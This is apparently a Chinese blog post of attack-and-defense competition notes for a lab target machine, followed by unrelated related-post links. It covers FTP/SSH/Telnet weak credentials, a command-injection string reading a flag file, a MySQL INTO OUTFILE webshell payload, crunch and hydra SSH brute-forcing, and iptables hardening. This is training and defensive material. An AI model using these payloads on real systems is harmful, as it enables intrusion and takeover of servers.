1. 信息收集,使用kali,扫描己方靶机端口

  1. 21端口的ftp的攻击

ftp攻击方式,查看本机有哪些普通用户

admin/123456和guest/123456

然后提交flag

  1. 22端口的ssh攻击

使用session –I 查看已经获取到的连接

使用session –I 序号 获取连接

  1. 23 telnet的攻击方式

  1. 防御21-23端口的攻击
  1. 改密码

  1. 或者删除500以上的用户

.

  1. 80http的攻击方法

进入自己的网站根目录

DisplayDirectory.php

此页面用来查看文件夹内的内容

使用&&加上cat /root/flagvalue.txt查看别人的flag,然后通过修改url,可以快速拿分

加固

FileSharing.php  文件上传漏洞

Kali生成木马

找到存储木马的路径

木马路径

使用工具连接

加固

WebShell.php

加固

通过查看TestConn.php页面可获知数据库密码为root/root

  1. 3306数据库攻击方式,使用kali远程连接别人的数据库

攻击代码

select '<?php system($_GET[\'a\']); ?>' INTO OUTFILE '/var/www/html/a.php';

攻击

加固漏洞

>use mysql;

>update user set Password=password('123456') where User='root';

修改密码即可

  1. 攻击10000以后的大端口后门

加固

写centos的iptables,关闭防火墙

清除防火墙预设规则

设置默认规则,拒绝所有进来的流量

设置默认规则,拒绝所有转发流量

设置默认规则,允许所有出去的流量

允许21,22,23,80,3306

保存防火墙规则

启动防火墙

查看结果

攻防对抗2

  1. 扫描

  1. 制作字典跑密码

crunch 6 6 -t 0000%%  > /passw

开始破解自己的密码

hydra -l root -P /passw -t 4 ssh://172.16.120.250

现在使用putty进去到自己的靶机

  1. 21-23端口攻击方法一致
  2. 80端口攻击

生成字典

调出网站后台破解工具

得出网站后台

  1. 3306与上文一致
  2. 大端口修改

攻击方法一致

加固方法需要谨慎

法1:shell脚本一次成型

法2:把防火墙规则写在防火墙配置文件里面

网络安全————靶机攻防加固相关推荐

  1. 攻防实战 | 芙蓉区网络安全技能大比武暨网络安全应急攻防演练圆满结束!

    9月上旬,由中共长沙市芙蓉区委网络安全和信息化委员会办公室长沙市芙蓉区总工会主办,湖南文盾信息技术有限公司.湖南省马栏云想视频技术研究院提供技术支撑的芙蓉区网络安全技能大比武暨网络安全应急攻防演练圆满 ...

  2. 2023年网络安全HW攻防技术总结(珍藏版)

    2023年网络安全HW攻防技术总结(珍藏版) 2022年护网正当时,相信不少网安人都已经进入了状态. 我们都知道, 护网行动 是国家应对网络安全问题所做的重要布局之一.至今已经是7个年头了,很多公司在 ...

  3. 感谢信温暖又至,聚铭网络助力网络安全防护攻防演练

    近日,南京城建隧桥智慧管理有限公司向聚铭网络发来感谢信,信中对聚铭团队在"隧桥2022网络安全防护攻防演练"活动中的积极配合与专业表现表示由衷感谢. 聚铭网络高度重视此次网络安全防 ...

  4. 维护网络安全要攻防兼备

    当今时代是信息化席卷全球的时代,也是互联网在我国全面普及的时代.目前,仅重庆全市的网民就近1400万.可是,网络中隐藏的安全隐患你又知道多少?19日,2016重庆网络安全宣传周启动仪式正式举行,全国首 ...

  5. 网络安全实战攻防演练丨防守方案经验分享

    2016年<网络安全法>颁布,出台网络安全演练相关规定:关键信息基础设施的运营者应"制定网络安全事件应急预案,并定期进行演练".网络安全实战化攻防演练作为国家层面促进各 ...

  6. 网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)

    目录 SQL Injection-LOW Union注入 注入点判断 字段判断 获取数据库名 获取表名 获取列名 获取数据 Error注入 获取表名 获取列名 获取数据 源码解析 主要步骤 漏洞原因 ...

  7. Linux横向之CSK靶机攻防

    文章前言 本篇文章主要以CSK靶机为例来介绍Linux环境下的外网渗透与内网渗透实例,当然本篇文章仅以当前实例为例,在实战中需结合具体的环境进行渗透 靶机下载 https://secplanet.sf ...

  8. 网络安全实战攻防演练应急处置预案

    第一章 社会工程攻击 1.1 监测阶段 (1) 蜜罐系统,还用于将检测到的疑似社会工程学攻击事件发送给控制器:控制器,还用于将蜜罐系统发送的疑似社会工程学攻击事件存储至数据存储系统,并向事件分析系统下 ...

  9. 社保系统漏洞或因代码缺陷 网络安全如何攻防?

    4月22日,大量社保系统相关漏洞出现在补天漏洞响应平台上. 补天漏洞响应平台发布信息称,社保系统.户籍查询系统.疾控中心.医院等大量爆出高危漏洞的省市已经超过30个,包括重庆.上海.河南等,涉及用户数 ...

最新文章

  1. java readline读取最后一行_java的转换流解析
  2. 企业安全挑战 内网安全技术十大策略
  3. python syntaxerror怎么解决-python中出现invalid syntax报错的几种原因
  4. “进度条”博客——第十六周
  5. 基于RxJava2+Retrofit2简单易用的网络请求实现
  6. esri-leaflet入门教程(5)- 动态绘制图形
  7. Jmeter4.0---- HTTP请求默认值(14)
  8. MySQL多库备份以及从多库备份中恢复某个库
  9. 前端复习笔记(三)——JavaScript和JQuery
  10. 【工控老马】PLC六路抢答器系统设计详解
  11. ADAS/AD控制器模块开发13 - Feature开发之LDWLKA
  12. 实验四--项目技术指标(招标文件)
  13. 用地图说话:在商业分析与演示中运用Excel数据地图(全彩)
  14. 图片心理性格测试
  15. 检测到目标站点存在javascript框架库漏洞
  16. 朱晔的互联网架构实践心得S2E2:写业务代码最容易掉的8种坑
  17. 戴尔linux改win7教程视频,戴尔笔记本win10改win7系统BIOS设置详细教程
  18. 金融统计分析python论文_金融统计分析论文
  19. Express 极速掌握 1
  20. 打开系统setting页面

热门文章

  1. 王者荣耀-重复名字昵称设置工具软件
  2. 过目不忘的读书法--[日]桦泽紫苑
  3. 关于李白,我想说......
  4. debian kafka_如何在Debian 10上安装Apache Kafka
  5. 那些年,任天堂发布的游戏机们
  6. php 页面显示volist,thinkphp 中的volist标签在ajax操作中的特殊性
  7. Java面试汇总>>>初级工程师—面试1000题
  8. 基于php_thinphp_vue养生馆保健品购物商城网站
  9. 计算机专家科学,陈荣元 - 专家学者 - - 计算机科学与技术 - 中南大学 - 学科服务平台...
  10. Android中list常用方法,Android中ListActivity用法实例分析